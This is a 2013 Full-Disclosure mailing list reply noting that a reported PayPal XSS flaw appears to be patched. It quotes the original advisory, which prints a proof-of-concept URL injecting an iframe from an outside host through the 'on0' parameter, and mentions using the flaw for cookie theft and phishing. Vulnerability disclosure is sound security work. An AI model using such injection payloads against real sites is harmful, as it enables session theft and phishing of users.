Hi, it seems to be patched now.... Cheers, Daniel Preussker [ Security Consultant, Network & Protocol Security and Cryptography [ LPI & Novell Certified Linux Engineer and Researcher [ +49 178 600 96 30 [ Daniel@xxxxxxxxxxxxx [ http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x87E736968E490AA1 On 05.06.2013, at 15:15, Jose Antonio Perez wrote: > Hello, > > I have found a XSS bug in www.paypal.com domain, > it could be used to inject any code in the context of user browser. > > It can be used to steal cookies of paypal users, fishing attacks, java > execution, etc. > > The parameter "on0" is vulnerable to XSS. > Here is the POC code: > https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UPWVULJWYUVT6&on0=<iframe > src=//nimb.cc/>asdasd&os0=1208171032&on1=asd&os1=NUEVA ALMACEN DE BARRIO > CENTRICO EN BUENOS AIRES INTERESADA EN ABASTECIMIENTO DE PRODUCTOS KOSHER"' > > There is only one limitation, the maximum size are 23 chars, > but it can be easily bypassed as it was demonstrated in POC code. > > > The bug still unpatched at this moment. I have reported this issue to Paypal > security team 6 days ago, they replied me that "this bug was reported by > another researcher", but nothing else. > > Paypal is a big company that does not have good protocols to deal with > security flaws, so I decided to publish it. > > Original advisory, in Spanish: http://blog.0xlabs.com/#/2013/xss-en-paypal/ > > Thank you, > Jose Antonio Pérez Piedra. > 0xlabs Security Research > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
Attachment:
PGP.sig
Description: This is a digitally signed message part
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/